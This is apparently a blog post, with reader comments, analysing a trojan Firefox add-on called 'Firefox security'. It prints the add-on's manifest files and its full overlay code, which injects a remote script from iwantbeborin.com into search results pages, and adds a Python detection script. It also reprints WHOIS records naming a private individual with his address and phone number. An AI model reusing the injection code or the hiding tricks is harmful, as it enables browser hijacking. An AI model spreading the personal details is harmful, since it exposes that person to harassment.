
Watch out for “Firefox security” at your Mozilla Firefox add-ons


If you open the Tools / Add-ons window in Mozilla Firefox (look under the Extensions tab), do you see an add-on called "Firefox security" with the subtitle "Internal security options editor."? If so, uninstall it immediately: it is the Trojan JS/Dursg.C or a variant of it.

See the JS/Dursg.C trojan description page for the other items the trojan installs (e.g. startup entries) that also need to be removed. You can also run Microsoft’s free OneCare Live Scanner with a full scan to remove this threat. It runs in Internet Explorer only, and on an infected system you may need to set the IE security zone to Low temporarily to get past the trojan’s interference, if IE reports that it did not allow the ActiveX control to initialize in an unsafe manner; set the zone back to its normal level once the scan is done.

Also remove the folder %ProgramFiles%\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D} (close Firefox first).

In there you’ll see:

(1) in the top folder, a chrome.manifest:

content    ttimer    chrome/content/
overlay    chrome://browser/content/browser.xul    chrome://ttimer/content/timer.xul
locale ttimer ja chrome/locale/ja/

Note the locale line: it registers a Japanese (ja) locale for the "ttimer" chrome package, an odd thing for an add-on posing as an internal Firefox component. The overlay line is the important one: it overlays chrome://browser/content/browser.xul, i.e. the main browser window, with the add-on’s timer.xul.

(2) an install.rdf file that names "Mozila Ltd." (note the single "l") as the creator of the add-on and describes it as "Internal security options editor." (the trailing dot in the description string alone could have made one suspicious). Note also <em:hidden>true</em:hidden>: this asks Firefox to hide the add-on from the Add-ons manager (honoured only for installs outside the profile, such as this one under %ProgramFiles%, and dropped in Firefox 4), so if you do not see it in the list, check the extensions folder above as well. The target application id is Firefox’s, and it claims compatibility with versions 2.* through 5.*:

<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:name>Firefox security</em:name>
    <em:id>{9CE11043-9A15-4207-A565-0C94C42D590D}</em:id>
    <em:version>2.0</em:version>
    <em:creator>Mozila Ltd.</em:creator>
    <em:description>Internal security options editor.</em:description>
    <em:type>2</em:type>
    <em:hidden>true</em:hidden>
    <em:targetApplication>
      <Description>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
        <em:minVersion>2.*</em:minVersion>
        <em:maxVersion>5.*</em:maxVersion>
      </Description>
    </em:targetApplication>
  </Description>
</RDF>

(3) in the chrome\content subfolder, a timer.xul overlay that injects a script from the attacker’s site into every results page of the Google / Yahoo / Bing / Ask.com / AOL search engines:

<?xml version="1.0" encoding="UTF-8"?>

<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

<script type="application/x-javascript">

// Runs in the privileged browser (chrome) context; "content" is the web page
// currently shown in the tab, so this writes straight into that page's DOM.
function Insert() {
  var headID = content.document.getElementsByTagName("head")[0];
  var newScript = content.document.createElement("script");
  newScript.type = "text/javascript";
  newScript.src = "http://iwantbeborin.com/request.php?aid=blackout";
  headID.appendChild(newScript);
}

// Plain substring tests on the page URL: any URL on these hosts that
// contains "search" triggers the injection.
function URL() {
  var url = content.document.location.href;
  if (url.indexOf("googlesearchserver") == -1) {
    if (url.indexOf("search") != -1) {
      if (url.indexOf("google.com") != -1) { Insert(); }
      if (url.indexOf("yahoo.com") != -1) { Insert(); }
      if (url.indexOf("bing.com") != -1) { Insert(); }
      if (url.indexOf("ask.com") != -1) { Insert(); }
      if (url.indexOf("aol.com/aol/search?s_it") != -1) { Insert(); }
    }
  }
}

window.addEventListener("load", init, false);

// Hooks DOMContentLoaded on the #appcontent element in the capture phase,
// so it fires for every page loaded in every tab of the window.
function init() {
  var appcontent = document.getElementById("appcontent");
  if (appcontent) {
    appcontent.addEventListener("DOMContentLoaded", onPageLoad, true);
  }
}

function onPageLoad(aEvent) {
  URL();
}

</script>
</overlay>

Note the clumsy style of the URL() function: five separate if statements where a single logical OR would do. Note also that the checks are plain substring matches, so any URL on those hosts that contains "search" triggers the injection, not only the search results page itself.

Web browsers should be stricter about known malicious extensions like this one: proactively check for them (at startup or periodically) and block them when found, even if the user installed them. Moreover, I don’t think extensions should be installable outside the browser’s own add-on management GUI, so that other applications and exploits can’t drop such a malicious extension into the browser without the user noticing. In fact I went on and suggested this to the Firefox team on Twitter (@firefox).
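The install.rdf fields and the remote-script idiom in timer.xul shown above are enough for a simple host-side check of the kind suggested in the previous paragraph. The following Python 3 script is an added example, not code from this post or from Mozilla. It walks the Firefox application and profile extension folders, parses each install.rdf, and flags the add-on ID from this post, the em:hidden flag, a "Mozila"-style creator look-alike, and any .xul/.js file that creates a <script> element and points its src at a remote http URL. The Windows directory guesses, the indicator labels, the function names and the temp-dir sample layout written by build_sample() are assumptions; the file contents it writes are trimmed copies of the install.rdf and timer.xul quoted above, used as constructed test data. Run with no arguments: on a Windows box with Firefox it scans the real folders, elsewhere it falls back to the constructed sample.

```python
"""Host-side check for the "Firefox security" (JS/Dursg.C) add-on indicators described in the post.
Added example, not code from the post or from Mozilla; paths, labels and names are assumptions."""
import glob
import os
import re
import tempfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RDF = "{http://www.w3.org/1999/02/22-rdf-syntax-ns#}"
EM = "{http://www.mozilla.org/2004/em-rdf#}"
KNOWN_BAD_IDS = {"{9CE11043-9A15-4207-A565-0C94C42D590D}"}   # add-on id from the post
KNOWN_BAD_HOSTS = {"iwantbeborin.com"}                        # injection host from the post
LOOKALIKE_RE = re.compile(r"\bmoz+il+a\b", re.IGNORECASE)     # "Mozila", "Mozzila", ...
INJECT_RE = re.compile(r'createElement\(\s*["\']script["\']\s*\)')
REMOTE_SRC_RE = re.compile(r'\.src\s*=\s*["\']\s*(https?://[^"\'\s]+)')

# Trimmed copies of the two files quoted in the post, used only as constructed sample data.
INSTALL_RDF = """<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
 <Description about="urn:mozilla:install-manifest">
  <em:name>Firefox security</em:name><em:id>{9CE11043-9A15-4207-A565-0C94C42D590D}</em:id>
  <em:creator>Mozila Ltd.</em:creator><em:hidden>true</em:hidden><em:type>2</em:type>
  <em:targetApplication><Description><em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
  </Description></em:targetApplication>
 </Description></RDF>"""
TIMER_XUL = """<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"><script>
function Insert() { var s = content.document.createElement("script");
  s.src = "http://iwantbeborin.com/request.php?aid=blackout"; }
</script></overlay>"""

def default_extension_roots():
    """Windows Firefox extension folders (application dir plus every profile) that exist."""
    pf, ad = os.environ.get("ProgramFiles", ""), os.environ.get("APPDATA", "")
    roots = [os.path.join(pf, "Mozilla Firefox", "extensions")] + glob.glob(
        os.path.join(ad, "Mozilla", "Firefox", "Profiles", "*", "extensions"))
    return [r for r in roots if os.path.isdir(r)]

def parse_install_rdf(path):
    """Top-level em:* fields of an install.rdf as a dict (targetApplication is skipped)."""
    desc = ET.parse(path).getroot().find(RDF + "Description")
    return {c.tag[len(EM):]: (c.text or "").strip() for c in desc
            if c.tag.startswith(EM) and c.tag != EM + "targetApplication"}

def find_remote_script_injection(ext_dir):
    """(relative file, url) pairs for remote src assignments in files that create <script> elements."""
    hits = []
    for path in glob.glob(os.path.join(ext_dir, "**", "*.*"), recursive=True):
        if path.lower().endswith((".xul", ".js", ".jsm")):
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if INJECT_RE.search(text):
                rel = os.path.relpath(path, ext_dir).replace(os.sep, "/")
                hits += [(rel, m.group(1)) for m in REMOTE_SRC_RE.finditer(text)]
    return hits

def scan_extension(ext_dir):
    """Indicator strings for one extension folder; an empty list means nothing matched."""
    rdf_path = os.path.join(ext_dir, "install.rdf")
    if not os.path.isfile(rdf_path):
        return []
    meta, findings = parse_install_rdf(rdf_path), []
    if meta.get("id") in KNOWN_BAD_IDS:
        findings.append("known-bad-id")
    # em:hidden hides an add-on installed outside the profile from the Add-ons manager (pre-Firefox 4).
    if meta.get("hidden", "").lower() == "true":
        findings.append("hidden-from-addons-manager")
    m = LOOKALIKE_RE.search(meta.get("creator", ""))
    if m and m.group(0).lower() != "mozilla":
        findings.append("creator-lookalike:" + m.group(0))
    for rel, url in find_remote_script_injection(ext_dir):
        host = urlsplit(url).hostname or ""
        tag = "known-bad-host" if host in KNOWN_BAD_HOSTS else "remote-script-injection"
        findings.append(f"{tag}:{rel}:{host}")
    return findings

def scan_roots(roots):
    """Map each extension folder under the given roots to its findings."""
    return {d: scan_extension(d) for root in roots
            for d in (os.path.join(root, e) for e in sorted(os.listdir(root))) if os.path.isdir(d)}

def build_sample():
    """Write the sample add-on plus a benign neighbour under a temp dir (constructed data)."""
    root = os.path.join(tempfile.mkdtemp(), "extensions")
    benign = INSTALL_RDF.replace("Mozila Ltd.", "Example Org").replace(">true<", ">false<") \
        .replace("{9CE11043-9A15-4207-A565-0C94C42D590D}", "good@example.org")
    for rel, text in [("{9CE11043-9A15-4207-A565-0C94C42D590D}/install.rdf", INSTALL_RDF),
                      ("{9CE11043-9A15-4207-A565-0C94C42D590D}/chrome/content/timer.xul", TIMER_XUL),
                      ("good@example.org/install.rdf", benign)]:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
    return root

if __name__ == "__main__":
    roots = default_extension_roots() or [build_sample()]   # no Firefox folders: scan the sample
    for ext_dir, findings in scan_roots(roots).items():
        print("SUSPICIOUS" if findings else "ok        ", ext_dir, *findings)
```

The remote-script check is the part worth keeping even after this particular add-on is gone: the add-on ID and host are trivial for the author to change, whereas creating a <script> element in the content document with an http src from a chrome overlay is the behaviour itself, and is rarely what a legitimate extension needs to do.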

In a system I cleaned recently, the add-on was loading the remote script from "iwantbeborin.com" and the pages showed "AdultFriendFinder" ads. It’s obvious they got something in return for advertising that; rogue businesses like AdultFriendFinder should be shut down (or at least blocked until they behave) by the authorities, since they show XXX content to minors, follow illegal trade practices that hurt competition, and intrude into third-party systems, threatening users’ privacy and costing them precious work time and money to repair their systems.

Domain Tools (http://whois.domaintools.com/iwantbeborin.com) has more info on this $$$hole:

Domain name: iwantbeborin.com
Status: Active
Protection Status: public
( make contact info private at http://www.now.cn/domain/domainPrivate.php )
Registrant:
Name: Alexey Prokopenko
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Administrative Contact:
Name: Alexey Prokopenko
Organization: Alexey Prokopenko
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Phone: +380.979668534
Fax: +380.979668535
Email:
Technical Contact:
Name: Alexey Prokopenko
Organization: Alexey Prokopenko
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Nameserver Information:
    ns1.everydns.net
    ns2.everydns.net
    ns3.everydns.net
    ns4.everydns.net
Create: 2010-03-16 06:06:02
Update: 2010-03-16
Expired: 2011-03-16
QueryTimes: 65


Their Reverse Whois info there says:

"Alexey Prokopenko" owns about 30 other domains

Email Search: is associated with about 76 domains

Registrar History: 1 registrar

NS History: 1 change on 2 unique name servers over 0 year.

IP History: 4 changes on 4 unique name servers over 0 years.

Whois History: 6 records have been archived since 2010-03-17 .

Reverse IP: 6 other sites hosted on this server.

If anyone has paid access to DomainTools I’d like to know which 30 other malicious domains this guy has and which 6 other sites are hosted on the same malicious server.

  1. 2010/11/02 at 14:37

    I know this is a very old post, but I just got this trojan installed in my browser, Firefox. The search queries were behaving weirdly: when I tried to open any site after searching on Google, it did not open and weird errors appeared, like “Method Not Allowed”.

    I just paid attention to the site that was loading when I searched for anything; it was iwantbeborin.com, and when I searched for it I found this post 🙂

    Thank you very much for your post. I have removed that add-on, but I can’t find this folder:

    \Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}

    I checked search results again and so far everything is working fine so I guess removing this folder is not important anymore.

  2. 2011/03/01 at 20:00

    glad it helped

  3. Yahoo
    2011/04/27 at 05:15

    Love internet explorer more than firefox
